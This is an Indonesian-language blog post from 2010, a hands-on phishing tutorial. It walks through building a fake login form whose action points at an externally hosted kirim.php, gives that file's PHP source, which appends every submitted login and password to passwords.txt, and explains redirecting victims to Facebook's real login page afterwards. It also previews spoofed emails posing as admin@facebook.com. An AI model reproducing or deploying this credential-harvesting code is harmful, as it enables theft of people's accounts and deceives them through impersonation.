Saturday, December 4, 2010

Phising Script


Hmm ini dia langkah selanjut nya setelah anda membaca Mengenal Phising,   langkah selanjut nya adalah kita membuat Fake Login...langsung aja deh gw buatin script nya

nih liat baik baik.....

  1. Buat lah Script bernama index.php (berisi login form dan me redirect ke kirim.php)

login

pass


Download Index.php

Setelah anda download.... lihat pada bagian form action nya...
saya menggunakan http://h1.ripway.com/hitbreaker/phising/kirim.php karena saya menaruh file kirim.php nya di ripway......


okeh..beres deh untuk login form nya...

sekarang kita buat proses nya....


2. Membuat file kirim.php
 <?php
header ('Location:  http://h1.ripway.com/hitbreaker/phising/passwords.txt ');
$handle = fopen("passwords.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle) ;
exit;
?>



Penjelasan dari script di atas...

fungsi dari headerlocation adalah me redirect/memanggil halaman yg di tuju....

jadi di dalam file kirim.php ini merupakan proses input data ke passwords.txt...

jadi msalkan kamu mau phising facebook..tinggal di rubah saja header location nya menjadi link login facebook berada....



okeh beres semua peralatan untuk phising nya.....

tutorial selanjut nya adalah fake email..
ex: facebook..
maka kita akan membuat email mengatas namakan admin facebook/admin@facebook.com

tunggu jam tayang nya aja yah... ^ ^
Share on :

No comments:

Post a Comment

 
© Copyright Idekubagus 2011 - Some rights reserved | Powered by Blogger.com.
Template Design by Fadly Nozella | Published by Borneo Templates and Theme4all